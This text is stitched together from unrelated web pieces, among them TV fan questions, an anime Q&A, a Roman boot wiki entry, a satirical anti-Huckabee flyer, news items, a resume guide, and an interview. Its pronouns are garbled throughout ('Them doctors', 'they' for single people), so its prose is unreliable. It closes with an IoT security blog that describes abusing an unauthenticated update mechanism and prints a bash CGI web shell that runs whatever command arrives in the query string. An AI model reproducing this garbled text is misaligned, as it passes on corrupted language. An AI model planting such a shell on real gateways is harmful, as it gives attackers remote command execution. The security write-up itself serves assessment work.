8. Why were there hidden cameras in the Polk's house? Sidney put cameras all over the Shaker mansion property, but we highly doubt the Polks let them deck out their home with hidden cameras too. If that's true, who filled the Polks' house with the cameras that caught their torture of Lee (and their confession to murdering Mason)?
9. What camera filmed the aerial shot of dead Audrey (Sarah Paulson)? While we're on the topic of confusing camera angles, if Return to Roanoke is supposed to be all found footage, then are we really supposed to believe that there just so happened to be a camera directly above where Audrey fell after being fatally shot? This just seems a bit too convenient for the found footage narrative we've been fed so far.
10. Is Lee still possessed? Lee was clearly serving Scathach when they went around murdering everyone on the last night of the Blood Moon, but once they woke up the next morning, it wasn't clear whether they were fully themselves again. Now that she's eaten the boar's heart, do they remain evil 24/7? Do they have amnesia about the murders similar to how Matt couldn't remember having sex with Scathach? Will they now become a murderer every year during the Blood Moon? Luckily for us, we have Lana Winters on the case to get to the bottom of all these Lee questions in the finale.
American Horror Story is plotting a Murder House-Coven crossover
11. Why did Scathach want to sleep with Matt? This is a very old and very powerful woman. Why are they so obsessed with shtupping a traveling salesperson? Do they need something from Matt — like the means to produce a child? — or is they merely smitten by their cute glasses and button-up combos?
12. What's the point of Priscilla? During My Roanoke Nightmare, it appeared as though Priscilla was a benevolent ghost. They tried to save Flora's life, led Matt and Shelby to the cellar where they discovered Elias' video, and was mentioned to have an antagonistic relationship with the Butcher.
But while Priscilla's presence loomed over the first half of the season, she's barely appeared since the show broke the fourth wall (unless you count brief glimpses from afar). Why would we spend so much time learning about them in the first half of the season if they don't play any role in the back half?
The American Horror Story rulebook to being a ghost
13. How were the Polks going to continue their family line? The Polks appear to practice incest in addition to cannibalism, but since everyone in the family is male except Mama Polk, how the hell were they going to stop their lineage from dying out without producing any daughters?
14. Where's Matt Bomer? Unless the actor is the man underneath the Piggy Man mask, the AHS alum has yet to make an appearance this season. Tick, tock, we're waiting!
15. How is Scathach the original Superme? Ryan Murphy has said Scathach is the original Supreme, but as all Coven fans know, there's only supposed to be one Supreme at a time. The majority of Coven was based around the fact that the old Supreme has to die for the new Supreme to arise. And yet Scathach was still running around in North Carolina while Fiona Goode was the Supreme in New Orleans. Is Scathach exempt from the rules because she's the OG Supreme? Are they actually a ghost? Are they somewhere between life and death that allows them to keep their immense powers while other Supremes come and go? It's possible Murphy is saving all these answers for the anticipated Murder House-Coven crossover season, but who wants to wait that long?
16. Why was the ground breathing? Seriously, WTF was up with this?
The American Horror Story: Roanoke finale airs Wednesday at 10/9c on FX.
boy kano asks:
How can an anime studio goes bankrupt? If they receive money from a publisher like Kadokawa , surely it can cover up the cost of making an anime title.
Anime studios can and do go bankrupt, and in the last few years, at least one or two notable ones have closed. The reasons why it can be myriad, and have nothing to do with the nuts and bolts of actual anime production: bad investments, overhead costs (expensive office space, or buying more equipment than they could afford), maybe they tried to produce an original show that tanked. Very often an old, grizzled industry veteran that knew how to keep the ol' ship afloat retires or passes away, and the people left simply don't know how to run the company. In some cases, there are shadier reasons, like embezzlement or bad loans.
In general, though, when anime studios fail, they tend to slowly bleed themselves to death by not controlling their costs. Anime is made on a very lean profit margin. The production committee, and specifically the company in charge of planning (kikaku) are responsible for brokering the deal with the animation company, who acts as a contractor. They may solicit bids from several anime studios for a given project, or they may have a specific studio in mind.
Here's the thing about producers: they are SHARKS. In entertainment production there is never enough time or money, and in making the film or TV series, there are always a huge number of sacrifices that have to be made. It's the producer's job to drive a hard bargain, getting the best work for the lowest possible price. Production costs are typically a fixed yen-amount per episode, and often go as low as US$200,000 an episode. By American TV standards, this is absurdly cheap for an original scripted television show, let alone an animated one. $200,000 per episode is about the budget of a low-tier cable reality TV show. (There are other expenses not covered by this figure, like marketing and DVD/Blu-ray authoring -- this is purely for production.) It's from that amount that up to 2,000 people -- credited and not -- need to be paid for their work. (Is it any wonder why wages are so abysmally low?)
So, several animation studios may bid on a given project, and based on the price they bid, as well as the studio's reputation, their working relationship with the producers, and other various factors, the producers will decide who gets the job. Once that offer is accepted, the price is set, and that is all that the studio will get paid to produce the show.
Anime goes over budget and over schedule ALL THE TIME. The character designs might be too extravagant, causing the animators to move slower than normal, so it's necessary to outsource more of the work. An animation checker might not be paying attention, causing a bunch of bad art to be colored and fully animated, and it needs to be redone. The director might not be satisfied with a handful of cuts and wants redos. It is entirely possible -- common, even -- that an animation studio will lose money on a project.
This actually isn't too far off from what happens with other animation-related businesses around the world, most notably in the computer graphics business. The tough-bargaining producers strike deals with the animation studios, who are less tough and tend to care more about the quality of the output rather than financial self-preservation. The animation staff will then wreck themselves going the extra mile, occasionally asking for more money. The producer will usually refuse, and hold the animation studio's feet to the fire. ("You signed a contract saying you could do the job for ¥XXX!") The animation staff then must decide if it will eat the extra cost, lose money and save their reputation, or cut corners and let the project turn into something nobody is happy with. Since anime staff are usually otaku , themselves, and have a lot of pride in what they make, the choice is usually obvious.
So you can see how an animation studio can very easily get themselves into trouble, especially if they bid too low in the first place, or signed a work agreement with the producer that doesn't have favorable terms. But in that way, animation studios aren't too much different from any other creative production vendor, such as an ad agency, a post-production company, or a graphic design firm. Business is tough. Show business is tougher.
Do YOU have a question for the Answerman?
We want your questions! Send in as many or as often as you like. We can only pick three questions a week (and unfortunately I don't have ALL the answers) so if you haven't been chosen, don't be discouraged, and keep on sending.
HOWEVER... CHECK THE ARCHIVES FIRST. I've answered a lot of questions already! Here are some common ones...
For the Latin Rite liturgical garment, see Liturgical stockings
Not to be confused with the Roman Emperor Caligula
caliga A reproduction of a Roman
Caligae (Latin; singular caliga) are heavy-soled hobnailed military boots known for being issued to Roman legionary soldiers and auxiliaries throughout the Roman Republic[citation needed] and Empire.
Name and history [ edit ]
caliga found at Egypt, c. 1st century BC – 1st century AD. An originalfound at Qasr Ibrim 1st century BC – 1st century AD.
Caligae (singular caliga) were heavy-duty, thick-soled openwork boots, with hobnailed soles. Caliga comes from the Latin 'callus' meaning hard, as hobnails were hammered into hard leather soles before being sewn onto a softer leather lattice. They were worn by the lower ranks of Roman cavalrymen and foot-soldiers, and possibly by some centurions.[1] A durable association of caligae with the common soldiery is evident in the latter's description as caligati ("booted ones").[2] In the early first century AD, the soldiery affectionately nicknamed the two or three year old Gaius "Caligula" ("little boot"), because they wore a diminutive soldier's outfit, complete with small caligae.[3][4] Occasionally, hobnailed caligae must have proved inconvenient, especially on hard surfaces; Josephus describes the killing of a caliga-shod Roman centurion who had slipped on the Temple of Jerusalem's marble floor during an attack.[5] Nevertheless, the design of the caliga allowed for its adjustment, which would have helped reduce chafing; it probably made an "ideal marching boot",[6] and "the thunderous sound of an attack by a hobnailed army (caligati) must have been terrifying."[7]
Caligae would have been cooler on the march than enclosed boots. In warm, Mediterranean climates, this may have been an advantage. In northern Britain's cold, wet climate, additional woven socks or raw wool wadding in winter may have helped insulate the feet; but caligae seemed to have been abandoned there by the end of the second century AD, in favour of civilian-style "closed boots" (carbatinae).[8] By the late 4th century, this seems to have applied throughout the Empire. The emperor Diocletian's Edict on Prices (301) includes set prices for caligae with no hobnails, made for civilian men, women and children.[9]
Design and manufacture [ edit ]
The caliga's midsole and the openwork upper were cut from a single piece of high quality cow or ox-hide. An outsole was fastened to the mid-sole, using clinched hobnails, usually of iron but occasionally bronze. The clinched hobnail ends were covered by an insole. Like all Roman footwear, the caliga was flat-soled. It was laced up the center of the foot and onto the top of the ankle. Isidore of Seville believed that the name "caliga" derived from the Latin callus ("hard leather"), or else from the fact that the boot was laced or tied on (ligere). Strapwork styles varied from maker to maker and region to region. The placement of hobnails is less variable; they functioned to give both grip and foot-support, much like a modern sports shoe. At least one provincial manufacturer of army caligae has been identified by name.[10]
See also [ edit ]
References [ edit ]
[Below is the text of a flyer that was found on windshields in several church parking lots in Ottumwa, Iowa on Sunday. The Romney, Giuliani, McCain, Tancredo, Hunter, and Paul campaigns have all denied authorship or distribution of it. The Keyes campaign could not be located for a comment. The Thompson campaign could not be awakened for a comment.]
IS MIKE HUCKABEE THE ANTICHRIST?
1. Think about it. Have you ever seen the two of them in the same place?
2. Revelation 13 says that the Antichrist's kingdom will be both a political and an ecclesiastical power. Huckabee, a Baptist minister, is running for president.
3. That's right: President. Haven't you seen The Omen, people? (Is it just a coincidence that "Mike Huckabee" is an almost perfect anagram for "I am Damien"?)
4. No normal American man over the age of 40 loses 110 pounds. It's not natural.
5. Read this: "And that is why part of me, I confess, wants Huckabee to win. So they can lose. So the GOP can lose - as spectacularly and humiliatingly as possible. If we are to rid conservatism of this theocratic cancer, we need to start over. Maybe it has to get worse before it can get better." Who said it? Andrew Sullivan. Have you ever heard of the psy-ops mind trick called "negative psychology"? If Sullivan -- a gay Catholic -- says they want Huckabee to get the Republican nomination so they can lose, you can bet your beanie that what the secret cabal of Romish sodomites really wants is for Huckabee to win.
6. Why do fundamentalist evangelicals support Israel? So that (Ezekiel 38-39) the forces of Gog and Magog can do battle in the valley of Megiddo in the 70th week of the End Times. No land of Israel, no Armageddon; no Armageddon, no Second Coming of Christ. Okay, so now tell me this: why has Tim LaHaye endorsed Mike Huckabee? Same reason. No Antichrist, no Left Behind. (By the way, is it just an "accident" that this point is number 6 on this list, and that there are 6 sentences in this point, and that the number of the beast is 666?)
7. Bill Clinton is from Hope. Mike Huckabee is from Hope. Do you really need someone to connect the dots?
8. Huckabee's sudden rise in the polls has been nothing short of miraculous. But II Thessalonians 2 points out how there will be a striking outward similarity between Antichrist and Christ. Did Christ support Their claim to be God with signs and wonders? Check. So Antichrist, too, will perform signs and wonders. (Zogby 12:16).
9. The secular progressive liberal "New York" media love Huckabee. They have said repeatedly that they are "charming," that they are likable, authentic, comfortable in their own skin. But the devil who used a serpent to deceive the woman in the garden was also charming (Genesis 3). The devil is comfortable in their own skin, too. Sure, Huckabee's rhetoric is beguiling; none dare call it parseltongue.
10. 9/11 9/11 9/11 9/11 9/11
Image copyright AP
Former New Orleans Mayor Ray Nagin has been sentenced to 10 years in prison for bribery, money laundering and other corruption charges.
They were convicted in February for accepting hundreds of thousands of dollars in bribes from business people.
Prosecutors say the bribes included the years immediately after Hurricane Katrina hit in 2005.
Nagin, 58, was mayor from 2002-10 and became the face of the city worldwide during the disaster.
US District Judge Helen Berrigan handed down the sentence on Wednesday. Prosecutors had been pushing for a 20-year sentence.
But defence lawyers for Nagin argued that amounted to a life sentence, and the six-years worth of bribes was an "aberration" in Nagin's otherwise upstanding service.
At least four Nagin associates have already pleaded guilty in the case.
Beginning in June 2004, two years after they were elected, Nagin took payments, travel and other gratuities in exchange for city contracts and other favours.
Image copyright Getty Images Image caption Nagin became well-known after a radio interview in which they angrily asked for more post-hurricane help
In one of the most high-profile instances of corruption in the case, Nagin accepted more than $160,000 (£100,000) in bribes from local business person Frank Fradella.
In exchange, Nagin helped Fradella secure millions of dollars in contracts from the city in the wake of Katrina, including construction at the airport and sidewalk repair projects.
Prosecutors argued during the trial that during their time in office, Nagin travelled with their family to Hawaii and Jamaica on trips paid for by local business people, as well as accepted free travel by private jet to Chicago, Las Vegas and New York City.
Nagin also received free granite for their family's business from a contractor as a bribe.
In letters to the judge ahead of sentencing, Nagin's family accused the US attorney's office that had investigated the case of misconduct.
They maintained the former mayor was innocent, the New Orleans Times- Picauyne reported.
Resume Format – Everything You Need to Know
Is your resume format that important?
Oh yes!
Your resume format can decide how quickly – or slowly – a recruiter or potential employee can see what you bring to the table.
Picture the scene:
After weeks of trawling through the job listings in your industry you have found the perfect job for you.
You know that you have the skills to do the job, you are a perfect fit and you know that you can ‘wow' at interview.
Sound familiar?
Now all you need to do is submit a resume and a cover letter that will get you an invite for an interview.
Competition for jobs is tough and a good resume can make all the difference between being invited to interview and being turned down before you even get a chance to speak to your potential employers.
When faced with a pile of resumes, do you know what interviewers do?
They look for any little reason to throw a resume on the ‘discard' pile and bring their list for interview down to a manageable level.
It makes sense, therefore, for you to do everything possible to make sure that your resume is in the very best shape it can be before submitting it.
Luckily, although it is important to get your resume right, it is not difficult. With a little know-how and a bit of time you can make sure that your resume truly shines.
The first thing to do is this:
Make sure that you choose the right resume format.
There are a number of different resume formats available, and each has their pros and cons. There are also many samples and templates available for each of the formats.
Here, we will take you through the different options available and advise you when to use them and when to avoid using them.
Note: Interchange ‘resume' and ‘resumes' with ‘CV ‘ and ‘CVs' throughout this article, depending on where you are in the world.
The Chronological Resume Format
The chronological resume format is the most traditional form of resume.
It is extremely popular with interviewers as it enables them to see where a candidate was working when they achieved certain goals.
It is a flexible format that is designed to put your work history and achievements together. It works particularly well for candidates who have a solid and continuous work history with no inexplicable gaps.
Some candidates with gaps in their employment history might worry that a chronological format might cause problems by highlighting periods of unemployment.
So how do you avoid that problem?
Like this:
It is possible to work around such problems by listing your employment history by year, e.g. 2003-2004, rather than October 2003 – January 2004. This is a little less specific and can be useful to avoid highlighting gaps of up to 11 months in employment.
You can also add unpaid work into the employment gaps on your resume. Many voluntary positions generate good quality transferable experience that allows you to build your skills.
But you still might be wondering:
“Do I have too many unexplained gaps on my resume?”
If so, you should think about using the ‘functional' resume format.
Related Articles:
The Functional Resume Format
The functional resume format explains your work background by highlighting your key skills rather than your chronological job history.
So what's the advantage of that?
This resume format is very useful for people returning to work after a career break or where there are long periods of unemployment that might be difficult to explain.
It can also be useful in applications where skills that you learned early on in your employment history will be important to the new position.
And the best reason for using a functional resume format?
It allows you to highlight your skills that are directly applicable to the job you are applying for, based upon the job description and the person specification of the role.
So if the job description emphasises customer service, make sure you place ‘customer service' as a key skill right at the top of your ‘skills' section on your functional resume.
And any downsides to this format?
Yes – there are, however, some problems with functional resumes.
Some employers can be suspicious of a functional resume precisely because it is often used to mask prior employment difficulties.
A functional format can also make it difficult for an interviewer to connect experience and achievements with a particular position.
If you truly feel that a functional format is best for your resume you can allay any concerns by referencing every skill back to a previous employer listed under a separate ‘work history' section.
Alternatively, you might think about using one of the other formats available.
The Combination Resume Format
The combination resume is exactly that:
A combination of a chronological and a functional resume that allows you to highlight your skills and achievements.
As such, it combines the strengths of each format while eliminating the weaknesses. The format highlights the skills you have perfected during your career but supported with a chronological history of your professional experience.
Best of both worlds.
Related Articles:
The Achievement Resume Format
This resume format is a variation of the functional resume but rather than concentrate on prior experience it highlights your main professional achievements.
Now:
While this can be a very powerful format it is not necessarily popular with interviewers and recruiters (for the same reasons as a functional resume).
Because of this, it is really only useful if you cannot make either a chronological or combination resume work for you and if you have a large number of big ticket, impressive achievements to shout about.
Just like a functional format, an achievement format can be helpful if you are returning to work after a lengthy career break. Highlighting your achievements in previous roles can help to show that you are a high quality prospect.
Once you have succeeded in getting back into employment you can revert to a more traditional format such as a combination resume.
The Targeted Resume Format
A targeted resume is the ultimate resume solution.
You can use any of the other formats as your base but rather than use a generic resume to send to prospective employers you take the time to customise your resume to highlight how your skills and experience match the job description.
This can be very labour intensive but if you are able to devote the time to this it will pay dividends as your resume will stand out and it will look as though you have really made an effort.
A candidate applying for their first job out of university is likely to be sending in applications to a large number of companies. A candidate in this position will not yet be in a position to truly differentiate their resume and target their skills to each specific employer (although if you can you should).
As candidates become more senior they will, inevitably, start to be more directed in their applications. As a rule of thumb the more senior the position you are applying for the more time you should spend targeting your resume to the job.
What to include…
Every good resume has a minimum amount of information on your background and experience.
You should have a minimum number of sections to cover:
Personal details including name, address, contact details (mobile number and email address).
Education history and academic qualifications.
Work experience (typically in reverse chronological order with your most recent position first).
Any professional qualifications.
Other information you may want to include:
Interests and hobbies outside of work.
Professional skills.
What not to include…
There is no need to take up valuable space adding details of referees, or even writing ‘references available upon request'.
Related Articles:
General Advice
No matter what line of employment you are in and how secure your job you never know when an excellent job opportunity will come up.
Keep your resume up to date to save yourself work down the line
It makes sense, therefore, to update your resume every year with all the experience you gained or any interesting projects you were involved in so that your basic format is ready to go at a moment's notice.
That way when you see the opportunity of a lifetime you will not have to spend time dusting off the off resume you used to apply for jobs after university.
You can then spend the time you have saved to target your resume to the job description.
Adjust the resume length to suit your industry
Most recruitment professionals will advise you to keep your resume to no more than 2 pages of A4.
While this is good advice there are times where you should think about derogating from this. A law firm hiring a solicitor, for example, will want to see details of representative matters the candidate has worked on.
Similarly researchers and science professionals may need to go into more detail than other job seekers.
If you still want to stick to the traditional 2 pages you can list the representative detail on a separate and attached document.
What's the standard in your profession?
If all of your colleagues have 5 page resumes listing their achievements in great detail the chances are that you should too. If you are in such a profession it makes sense to have a number of different resumes in various lengths (2 pages, 4 pages, etc.).
This will allow you to choose the version most appropriate to the position you are applying for.
Consider the layout of your resume to make it attractive on the eye
Do not use a small typeface or crowd your paragraphs just to keep your resume to 2 pages. A good, readable resume will have plenty of ‘white space' on the page so that it looks inviting.
The problem with resumes that have text all bunched up is this:
They tend to put recruiters and employers off, with such resumes being more likely to end up in the ‘reject' pile.
Related Articles:
Mention your personal interests to demonstrate your personality and help build rapport
It is a good idea to devote a (small) section of your resume to your personal interests.
Here's why:
Many hobbies allow individuals to develop transferable skills that an employer might be interested in.
And it gets better:
Your interests may also be interests of the person who is going to interview you. Having an interest in common before you've even had chance to meet will really help break the ice and build rapport at interview.
Target your interests wherever possible:
Don't make general statements such as ‘reading' or ‘cooking' as these look as though you have no real interests and are struggling to find ‘filler' content on the resume.
High calibre candidates would, for example, specify exactly what they like to read about or what and when they like to cook.
But be warned:
Make sure, however, that if you do this you only include interests that you can genuinely talk about because you do not want to be caught out if the interviewer is a fellow enthusiast.
Sell yourself, but don't exaggerate the truth to the extent that you're lying
Good candidates are always honest about their skills.
There is nothing wrong with celebrating your experience and even talking it up a little but do not over-exaggerate what you can do.
Qualifications and prior work experience can always be checked and if you are found to have lied, even on the smallest of things, you will lose all credibility.
And guess what?
You won't get the job.
Do not, therefore, boast on your resume that you can speak fluent Spanish if all you can do is order tapas. You may not ever be found out but imagine how mortifying it would be to be interviewed by a fluent speaker who decides to conduct the interview in Spanish.
With all these tips in mind you are ready to write the resume that will get you through the door and ready to nail the job at interview.
Good luck!
This has to be one of the best episodes so far. It may not be the most exciting episode, but every segment this week's was incredibly solid and they took the time to let the scenes breathe. This episode was the calm before the storm and the end are coming, and it will be glorious. Jamie is back on track with book Jamie, Cersei is getting all kinds of burns, Margery isn't just a puppet. John and Sansa are working together and little lady Mormont is adorable. And finally, Arya, they had a very short but exciting ark this week. Our prayers are with you fictional character.
Consider making a one-time or recurring donation by going here: Patreon.com/castofthrones The coHosts- Nick Bristow, Michael ‘Thrifty Nerd' DiMauro, Tim Lanning, Jennifer Cheek Subscribe and Rate on iTunes or Subscribe directly to the Feed Like us on Facebook
An artificial heart offers a real chance
After years of declining health, Tammy Lumpkins becomes the first West Coast patient to be released from the hospital after receiving an artificial heart. The device will buy them some time until they can get a transplant.
So in late September, Bowdish implanted an artificial heart in Lumpkins to replace both of the organ's chambers and all four valves. And on Wednesday, Lumpkins will become the first person on the West Coast to leave the hospital with such a device.
"To say they were on the brink of death was an understatement," said Dr. Michael Bowdish, a cardiothoracic surgeon at Keck Hospital.
Them doctors got them onto the transplant list, but as they waited, their health deteriorated. Them liver and kidneys started to fail and they couldn't get out of bed.
When 46-year-old Tammy Lumpkins showed up at Keck Hospital of USC in August, they needed a new heart.
Lumpkins said they feel lucky to be alive and grateful to be leaving the hospital. Now they can watch their 19-year-old son graduate from ITT Technical Institute in December. And after nearly 20 years with heart problems, Lumpkins said Tuesday that they had renewed confidence that they would finally get better.
"I was ready to give up last summer," they said, sitting beside their husband in front of the hospital. "Now there's a light at the end of the tunnel and it's getting brighter."
Although artificial hearts aren't new, patients have traditionally had to stay in the hospital because the machine necessary to make them work weighed more than 400 pounds. Now, new technology allows patients to go home while they wait for heart transplants. The device, which weighs almost 14 pounds, can be carried in a small backpack.
"She can go home and live a normal life," said Bowdish, who directs the hospital's artificial heart program.
More than 950 people have received artificial hearts and 22 people in the United States have gone home with the lightweight devices, according to Don Isaacs, spokesperson for SynCardia, the Tucson-based company that manufacturers the artificial heart. The device costs about $124,000 and an additional $18,000 a year to maintain, Isaacs said. Although the heart is approved by the Food and Drug Administration, the backpack device is part of a clinical trial.
Patients can live with the artificial heart for years, although the goal is to get them transplants as soon as possible. "But the reality is there's a wait, and sometimes a long wait," they said.
More than 3,100 patients are waiting for heart transplants. The average wait is 168 days, according to the United Network for Organ Sharing.
"The supply doesn't meet the demand," said Dr. Kathy E. Magliato, a cardiothoracic surgeon and president of the American Heart Assn. board in Los Angeles. An artificial heart can save the lives of patients who cannot wait for transplants, they said.
Lumpkins, who lives near Modesto, was 28 when they were diagnosed with cardiomyopathy, a disease that weakens and enlarges the heart. Five years later, doctors told them they had congestive heart failure. Since early 2010, Lumpkins said, they have been in and out of the hospital. Them husband, Dale, an electrician, said their insurance will pay for some of the medical bills.
Because they must stay relatively close to the hospital, Lumpkins will live temporarily at a friend's house in Hemet and return weekly for checkups. After the holidays, Bowdish said, they plan to actively start looking for a transplant heart.
With the machine pumping loudly beside their Tuesday, Lumpkins said they were nervous. "It's scary not knowing what's going to happen," they said. "But I'm feeling 100% better than I ever did."
Surigao del Norte 2nd District Representative Robert Ace Barbers' measure would also allow President Rodrigo Duterte to appoint officers-in-charge once the barangay polls are postponed
Published 9:29 PM, March 27, 2017
MANILA, Philippines – Surigao del Norte 2nd District Representative Robert Ace Barbers filed the first bill seeking to postpone the barangay elections originally set for October 23, 2017.
In House Bill (HB) Number 5359 filed on Wednesday, March 22, Barbers proposed moving this year's barangay polls to May 25, 2020.
President Rodrigo Duterte has said that they want to postpone the barangay elections scheduled this year and appoint village officials.
Barbers sent the media a copy of the bill on Monday, March 27.
HB 5359 aims to allow the postponement of this year's barangay polls by inserting provisions under Republic Act (RA) Number 9164, or the law providing for the synchronized barangay and Sangguniang Kabataan (SK) elections.
HB 5359 would also give the President the power to appoint barangay officials upon the postponement of the elections.
“All incumbent barangay officials shall be deemed terminated upon the approval of this Act. Officers-in-charge shall be appointed by the President,” read HB 5359.
Apart from fulfilling Duterte's wishes, Barbers mentioned the ongoing war against drugs as one of the primary reasons for filing the said bill.
“Barangays are our first line of defense in the grassroots level. As such, they must spearhead the government's fight against illegal drugs and must maintain a proactive stand in shielding the ordinary people from the drug menace,” Barbers said in their explanatory note.
“However, how will the barangay lead this war if some officials are patrons and protectors of drug lords? The barangay system is merely giving more benefit to the political patrons of these barangay officials, added to the fact that there is purported influence of drug money in the political exercise,” they added.
Speaker Pantaleon Alvarez said they agree with the President's plan, but clarified that the Local Government Code of 1991 must be amended first. Alvarez is currently in the process of filing their own version of the measure. (READ: Alvarez confident Local Gov't Code can be amended for barangay OICs)
Last year, both houses of Congress successfully passed the measure postponing the barangay and SK polls – initially scheduled October 2016 – after the President asked them to do so. (READ: Duterte signs law postponing barangay, SK elections)
Duterte had said that holding barangay elections would only ensure the victory of candidates funded by drug lords. According to Interior Secretary Ismael Sueno, the President wants handpicked appointees in every barangay in the Philippines to rid the country of drugs.
– Rappler.com
A woman who was caught on video driving along a sidewalk to avoid a stopped school bus has been ordered to wear an "idiot" sign at the intersection where it happened.
Shena Hardin, 32, of Cleveland pleaded guilty to not stopping for a school bus and reckless operation. A Cleveland Municipal Court judge ordered their driver's license suspended for 30 days and ordered them to pay $250 in court costs, according to WJW Fox 8.
As part of the sentence, Hardin must also must wear a sign that reads, "Only an idiot would drive on the sidewalk to avoid the school bus" for an hour a day for two days next week at the intersection where the incident occurred, according to Fox 8.
Hardin was arrested on Sept. 11 after a veteran school bus driver, Uriah Herron, noticed Hardin pull their driving stunt several times and recorded one incident with their cellphone camera.
"We had a very conscientious driver for 30 years. They really cares about their children and they took the extra step that this doesn't happen again," Cleveland Metropolitan School District bus manager Eric Taylor told newsnet5.com.
The judge's unique sentence predictably has drawn hundreds of comments on social media. Many agree with the sentence, saying more judges should strive for nontraditional penalties. Others, however, argue that the punishment is too degrading and humiliating for a motor vehicle violation.
News in Science
Could mobiles affect some more than others?
Mobile effects Mobile phones affect the brainwaves of some individuals more than others, say researchers, who are calling for a rethink about how we study the effects of the pervasive technology.
Professor Rodney Croft, of the University of Wollongong, and colleagues, report their findings in the journal Bioelectromagnetics.
"The kind of studies that we do may be overlooking some problems," says Croft, who studies radiofrequency health effects.
Some studies have suggested that mobile phones can increase human electroencephalogram (EEG) activity during wake and sleep, says Croft.
But findings, including those made by Croft and colleagues in an NHRMC-funded study, have found that the increase in brainwave activity does not appear to have health effects.
"We found on average there was an increase but it was very small and there was no effect on sleep quality," says Croft.
But, Croft and colleagues did notice that the effect on the brainwaves was much greater in some people than in others.
They hypothesised that the averaging out of effects across the whole group was masking individual variability in sensitivity to mobile phone emissions.
"It could be that people are responding quite differently, with some people exhibiting no effect and others exhibiting a substantial effect," says Croft.
Follow-up study
To test if there were any individual differences in the effect of mobile phones on EEG and sleep, the researchers retrieved 20 volunteers who had been involved in their previous study and tested them again.
"The logic was that if there were individual differences, we'd find that those who had an effect the first time would have an effect the second time," says Croft. "And those that didn't have an effect the first time wouldn't have an effect the second time."
For two consecutive nights, volunteers were exposed for 30 minutes to a mobile phone, positioned in a cradle over the right temporal region, before going to sleep.
On one night the phone was continuously transmitting and on the other it was turned off - a so-called 'sham control'. The volunteers didn't know whether the phone was turned or not.
Brainwave monitoring during sleep showed, in keeping with previous findings, that exposure to mobile phones increased EEG activity during the first 30 minutes of non-rapid eye movement (non-REM) sleep.
But what was most interesting was the increase was more prominent in those individuals who had shown an increase in the previous study, supporting Croft and colleagues' hypothesis.
"The response to mobile phones seems to be mediated by some kind of individual difference," says Croft.
While Croft and colleagues still found no impact on the quality of sleep, they say the findings question the reliability of previous studies, including those which have found no effect on EEG.
"Finding no effect or a very small effect could be the result of averaging people together. By looking at groups as a whole we may be missing important things," says Croft. "It raises the question whether we can be as confident in past research as we have been."
"Given the far-reaching implications of mobile phone research, we may need to rethink the interpretation of results and the manner in which research is conducted in this field," say Croft and colleagues.
Sensitive subgroup?
The research has been welcomed by Dr Edoardo Aromataris, of the The Joanna Briggs Institute, which assesses evidence for healthcare.
Aromataris says the study suggests that there could be a subgroup of people whose EEGs are predisposed to being effected by mobile phones.
"It might be a physiological difference, or it might be a psychological difference," they say. "If this is true, all of what has gone before will be put to question."
Aromataris says individual differences in physiology are already known to be very important. For example, it causes some individuals to be more sensitive to the effect of drugs than others, something that is often not discovered until after drugs are on the market.
They suggest it could be useful for researchers to eventually develop and test hypotheses about which subgroups of people are most sensitive to mobile phone impact on EEG.
"This is really how science progresses," says Aromataris. "[Croft and colleagues] have seen something there that others haven't and that could potentially spin off [research] in another direction or it could not."
17: What was the creative process behind this record?
K$: The whole thing as a package I've been working on for seven years, and I've written every song on the record — and I've written over 200 so it's the best of the best. Literally, there were so many songs that they had to extend it from 12 to 14 songs.
17: What do you think our readers will like most about it?
K$: For girls, I think it's an empowering record, it's funny, it's cheeky. I think people need to have fun with whatever they're doing — makeup, their clothes, music, live shows — anything you don't need to take too seriously, don't take too seriously.
17: Do you ever get nervous on stage?
K$: Right before it's terrifying. But once I'm on stage, I feed off other people's energy.
17: Do you have a ritual or confidence tip before you go on?
K$: My band and I, we cover our bodies in hairspray and glitter. We use the hairspray to make sure the glitter sticks. Then we draw dollar signs all over our bods, and then I have my laser gloves that shoot lasers out my fingers, and I have a backpack confetti canon. It's just a party!
17: Why is your record called Animal?
K$: I've done research on animals because I'm a diver, and I used to wear gold bikinis and had eye piercings and stuff, and then I almost got eaten by a barracuda once, and I was like "Why do they keep chasing me? Why do they want to eat me?" And then I was researching and found out that animals are really attracted to shiny things, especially gold and silver, so I feel like if I cover my body and the audience with glitter then they'll like it.
17: What glitter do you use?
K$: I love MAC glitter — it's just unreal!
17: How do you describe your style?
K$: Garbage can chic? I like vintage a lot. I like not trying — I think girls need someone to look up to who's not in high heels and a push-up bra. I can't walk in high heels, never mind dance in them. I think it's all about your confidence and having positive energy.
17: Do you have any vintage shopping tips?
K$: Always go for the really soft T-shirts, because if you find an amazing one, you can cut it out, sew it, tie it in the back, and make it look smaller and cuter.
For more on Ke$ha, visit keshasparty.com.
The main driver to use a certain protocol is compability. For instance RF433 has larger range but does not feature mesh networks or default security mechanisms. This means that if you want security you will have to come up with your own protocol, which means your end-users will not be able to just buy any off the shelf sensors or devices. ZigBee and Z-Wave largely have this instead. The main difference between ZigBee and Z-Wave is the range at which a device can communicate.
You can find some more information on ZigBee security in this white paper from Blackhat here. Also here's a paper on Z-Wave from Sigma Designs.
Threat vectoring
Any security assessment requires you to evaluate who your adversaries are and how they might want to abuse or compromise your systems and what they might use it for. When I do my threat vectoring I consider the information contained within the environment, which actuators are in place and what risk they might pose. Compromise of an IoT device may be used to target the IoT environment or simply be used like a bot in a botnet to attack external networks (or a combination of both). You should evaluate what can be done with each of the actuators and how certain sensor values may influence the environment. To do this you must have a good understanding on how your IoT ecosystem works, what type of devices might be used and how this might expand. One talk I attended recently at GovWare discussed the Ransomeware of Things. The presenter suggested that in the near future our own home appliances could be holding us hostage. For instance doors not opening, automated vacuum cleaners turning off and on or refrigderators changing temperature to make food spoil:
Common vulnerabilities found in IoT solutions
Unauthenticated update mechanisms
SQL/JSON injection
Bad design
Too much trust
Unauthenticated update mechanisms
There are many different ways of updating packages. Some of them used the traditional package managers found in Linux systems, others used less traditional means, such as executables that can be run from a computer on the same network, to pushing down updates from the cloud environment. The biggest issue with these home grown mechanisms is that they are not using secure means to deliver the packages. For instance the mechanism using a standalone executable, accessed a hidden API which could be used to replace files on the gateway. All you needed to do was to upload a CGI file and replace an existing file. In this specific case the gateway was running on bash CGI, so we uploaded our own shell:
#!/bin/sh echo -e "Content-type: text/html\r
\r
" echo "blaat" #echo "$QUERY_STRING" CMD = "$QUERY_STRING" test2 = $( echo $CMD | sed 's|[\]||g' | sed 's|%20| |g' ) $test2
